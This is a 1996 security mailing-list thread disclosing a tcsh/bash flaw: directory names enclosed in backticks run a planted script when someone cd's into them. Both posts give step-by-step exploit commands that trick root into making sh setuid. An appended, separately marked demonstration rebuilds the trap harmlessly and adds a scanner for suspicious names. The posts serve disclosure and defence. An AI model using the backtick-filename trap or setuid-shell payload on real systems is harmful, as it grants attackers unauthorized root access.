From hartwick@primeline.net  Sat Sep 14 13:51:02 1996
Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id NAA07725 for <best-of-security@suburbia.net>; Sat, 14 Sep 1996 13:50:38 +1000
Received: from primeline.net (root@ns.primeline.net [207.81.5.2]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id UAA03563 for <best-of-security@suburbia.net>; Fri, 13 Sep 1996 20:06:53 -0700 (PDT)
Received: from primeline.net (hartwick@primeline.primeline.net [207.81.5.2]) by primeline.net (8.7.5/8.6.9) with SMTP id WAA23762; Fri, 13 Sep 1996 22:53:12 -0400
Date: Fri, 13 Sep 1996 22:53:11 -0400 (EDT)
From: "Michael J. Hartwick" <hartwick@primeline.net>
To: test <butafuco@mc.net>
cc: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>,
        best-of-security@suburbia.net
Subject: Re: BoS:      tee see shell problems
In-Reply-To: <Pine.BSI.3.95.960912182823.18594A-100000@maxx.mc.net>
Message-ID: <Pine.LNX.3.94.960913223432.23513A-100000@primeline.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

I just tested a variation of this exploit with bash 1.14.6(1)
running on Linux 2.0.13.  By using my variation I managed to become root.
I find this frightening.  In my variation I wasn't as subtle, in order to
use a large portion of the original exploit.  Hopefully things like this
won't happen, but it is possible.  I know that I will forever be much more
careful when cd'ing from now on.  This is a very simplistic example, but I
am sure more difficult ones can be devised.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% cd /tmp/\`source\ .WaReZ\`
jim% echo chmod 4755 `which sh` 2\&\> /dev/null > .WaReZ
jim% chmod +x .WaReZ
jim% cd

---------------------------Cut to unsuspecting foo------------------------

jim# whoami
root
jim# echo $SHELL
/bin/bash
jim# I just like to check that sometimes.
jim# Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim# cd /tmp
jim# ls

`source .WaReZ`

jim# OH BOY!!! the jackpot!
jim# cd *WaReZ*
jim# ls

jim# oh, oh well maybe I'll check later...
jim# cd

----------------------------Cut to More Bad guy--------------------------

jim% bash
# whoami
root
# hah.

---------------------------End Unix Parable-------------------------------

On Fri, 13 Sep 1996, test wrote:

>A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
>out with BSDI anyway) that allows the execution of arbitrary commands
>when changing into directories whose names are enclosed in backticks.  The
>problem might also prove to be quite bad for tcsh scripts that find
>themselves changing into directories on the fly.
>
>Here is probably one of the dumbest methods possible that could be used to
>exploit this weakness.
>
>----------------------------Cut to Bad guy--------------------------------
>
>jim% whoami
>Evol bad guy
>jim% mkdir /tmp/\`source\ .WaReZ\`
>jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
>jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
>jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
>jim% chmod +x /tmp/*W*/.WaReZ
>
>---------------------------Cut to unsuspecting foo------------------------
>
>jim% whoami
>Unsuspecting foo
>jim% echo $SHELL
>/bin/tcsh
>jim% I just like to check that sometimes.
>jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
>jim% cd /tmp
>jim% ls
>
>`source .WaReZ`
>
>jim% OH BOY!!! the jackpot!
>jim% cd *WaReZ*
>jim% ls
>
>jim% oh, oh well maybe I'll check later...
>jim% cd $HOME
>
>----------------------------Cut to More Bad guy--------------------------
>
>jim% ls -a /tmp/*W*/
>
>.
>..
>.24753
>
>jim% /tmp/*W*/.24753
>$ whoami
>unsuspecting foo
>$ hah.
>---------------------------End Unix Parable-------------------------------
>

----------------------------------------------------------------------------
Michael J. Hartwick, VE3SLQ
Hartwick Communications Consulting
hartwick@primeline.net
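An added demonstration, not code from either post above, that rebuilds the
trap from the thread in a scratch directory with a harmless payload, shows
that the directory name does nothing until a shell re-evaluates it, and
gives a check for such names in a directory like /tmp.  A current sh does
not re-expand a directory name on its own, so the faulty re-evaluation of
tcsh 6.05 / bash 1.14.6 is simulated with eval; the comment tying the old
bash behaviour to \w in PS1 is my reading of the mechanism, not something
either post states.  "sh .WaReZ" replaces "source .WaReZ" so plain /bin/sh
can run the payload.

```shell
#!/bin/sh
# Added example, not code from either post.  Rebuilds the booby-trapped
# directory with a harmless payload, contrasts a quoted chdir with a shell
# that re-evaluates the directory name (simulated with eval), and checks a
# directory for names a shell would act on.

SANDBOX=$(mktemp -d) || exit 1
trap 'rm -rf "$SANDBOX"' EXIT
TRAPDIR="$SANDBOX/\`sh .WaReZ\`"   # the directory name is a command substitution
MARKER="$SANDBOX/payload-ran"      # payload creates this instead of chmod 4755 /bin/sh

# Same layout as the posts: a dot-file payload inside the trapped directory.
# "sh .WaReZ" replaces "source .WaReZ" so plain /bin/sh can run it.
build_trap() {
    [ -d "$TRAPDIR" ] || mkdir "$TRAPDIR" || return 1
    printf 'touch "%s"\n' "$MARKER" > "$TRAPDIR/.WaReZ"
}

# Safe handling: a quoted chdir and a listing treat the name as data.
# Returns 0 if the payload did NOT run.
safe_cd() {
    rm -f "$MARKER"
    ( cd -- "$TRAPDIR" && ls -a >/dev/null ) || return 2
    [ ! -e "$MARKER" ]
}

# Vulnerable handling: after the chdir the shell re-expands the directory
# name it already holds.  (My reading of the old bash case: \w in PS1 is
# decoded to the directory name and the decoded prompt then goes through
# command substitution; the tcsh post shows the same effect after cd.)
# eval stands in for that re-expansion.  Returns 0 if the payload DID run.
unsafe_cd() {
    rm -f "$MARKER"
    ( cd -- "$TRAPDIR" && eval "prompt=\"${PWD##*/}\"" ) 2>/dev/null
    [ -e "$MARKER" ]
}

# Check for the precondition: entries whose names contain characters a
# shell would act on if it ever re-evaluated them.  Prints each one and
# leaves the count in SUSPICIOUS_COUNT.
NL='
'
suspicious_names() {
    dir=$1
    SUSPICIOUS_COUNT=0
    for entry in "$dir"/* "$dir"/.[!.]* "$dir"/..?*; do
        [ -e "$entry" ] || continue            # pattern matched nothing
        name=${entry##*/}
        case $name in
            *['`$;|&<>()']*|*"$NL"*)
                printf 'suspicious name in %s: %s\n' "$dir" "$name"
                SUSPICIOUS_COUNT=$((SUSPICIOUS_COUNT + 1)) ;;
        esac
    done
}

build_trap || exit 1
safe_cd   && echo "quoted cd:         payload did not run"
unsafe_cd && echo "re-evaluated name: payload ran, $MARKER exists"
suspicious_names "$SANDBOX"
```

The quoted cd is the only step a cautious root user controls; the check
function is what you would run over /tmp (or any world-writable directory)
before poking around in it with an interactive shell you do not fully trust.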

